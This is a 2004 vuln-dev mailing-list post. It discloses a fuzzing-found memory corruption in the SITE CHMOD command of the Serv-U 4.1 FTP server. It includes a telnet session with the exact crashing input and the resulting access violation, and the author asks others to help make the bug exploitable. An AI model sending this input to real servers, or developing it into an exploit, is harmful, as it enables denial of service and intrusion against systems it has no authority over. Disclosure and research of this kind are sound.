Serv-U 4.1 Memory Corruption / Whatever

From: Der Ago (maillist_at_bastart.eu.org)
Date: 02/16/04

  • Next message: AJ McKee: "RE: Messenger Pro 3 from Clickatell.{Allows you to spoof Mobile Numbers}"
    Date: Mon, 16 Feb 2004 22:10:57 +0100
    To: vuln-dev@securityfocus.com
    
    

    Well, I didn't have the time to fully analyze it yet, but by using a
    fuzzer to check Serv-U, I found something that crashed it using bad data
    in SITE CHMOD. This is not the already discovered vulnerability, cause it
    can be used without write access, the crash occurs before permissions are
    even checked. Seems like an off-by-two, cause you can control 2 bytes of
    a dword where your buffer gets written, but I wasn't able to find how the
    other 2 bytes are controlled yet, and I wasn't able to do anything useful
    with the 2 bytes I have cause they can't be NULL. Well, I hope someone
    can enlighten me a little, cause I tried the last 2 days and now I'm out
    of ideas.

    hello@proxy:~# telnet ftp.target.com 21
    Trying 127.0.0.1...
    Connected to 127.0.0.1.
    Escape character is '^]'.
    220 Serv-U FTP Server v4.0 for WinSock ready...
    USER myuser
    331 User name okay, need password.
    PASS mypass
    230 User logged in, proceed.
    SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    Connection closed by foreign host.
    hello@proxy:~#

    This will cause an access violation writing to 0x555551AD (UUQ-)

